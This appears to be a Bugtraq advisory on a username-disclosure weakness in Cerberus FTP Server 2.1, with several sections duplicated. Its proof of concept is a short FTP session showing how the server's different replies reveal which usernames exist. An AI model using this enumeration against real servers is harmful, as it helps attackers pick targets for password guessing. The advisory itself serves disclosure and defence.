Cerberus FTP Server Information Disclosure Weakness
BID:7369
Info
Cerberus FTP Server Information Disclosure Weakness
| Bugtraq ID: | 7369 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 16 2003 12:00AM |
| Updated: | Apr 16 2003 12:00AM |
| Credit: | Discovery of this vulnerability has been credited to "Ziv Kamir" <[email protected]>. |
| Vulnerable: |
Cerberus FTP Server 2.1 |
| Not Vulnerable: | |
Discussion
Cerberus FTP Server Information Disclosure Weakness
It has been reported that Cerberus FTP Server is prone to an information disclosure weakness.
The problem exists in the way the FTP server handles the authentication procedure. An attacker may exploit a weakness in error handling to disclose valid usernames.
It should be noted that although this weakness was reported to affect Cerberus FTP server version 2.1, previous versions might also be affected.
It has been reported that Cerberus FTP Server is prone to an information disclosure weakness.
The problem exists in the way the FTP server handles the authentication procedure. An attacker may exploit a weakness in error handling to disclose valid usernames.
It should be noted that although this weakness was reported to affect Cerberus FTP server version 2.1, previous versions might also be affected.
Exploit / POC
Cerberus FTP Server Information Disclosure Weakness
The following proof of concept has been supplied:
c:\ ftp www.example.com
User (X.X.X.X:(none)): Not_Valid_User
530 Unknown user
***
Login failed.
Valid User ( The Username Is Hack )
----------
c:\ ftp www.example.com
User (X.X.X.X:(none)): Hack
331 User Hack Ok, password please
***
Password:
The following proof of concept has been supplied:
c:\ ftp www.example.com
User (X.X.X.X:(none)): Not_Valid_User
530 Unknown user
***
Login failed.
Valid User ( The Username Is Hack )
----------
c:\ ftp www.example.com
User (X.X.X.X:(none)): Hack
331 User Hack Ok, password please
***
Password:
Solution / Fix
Cerberus FTP Server Information Disclosure Weakness
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.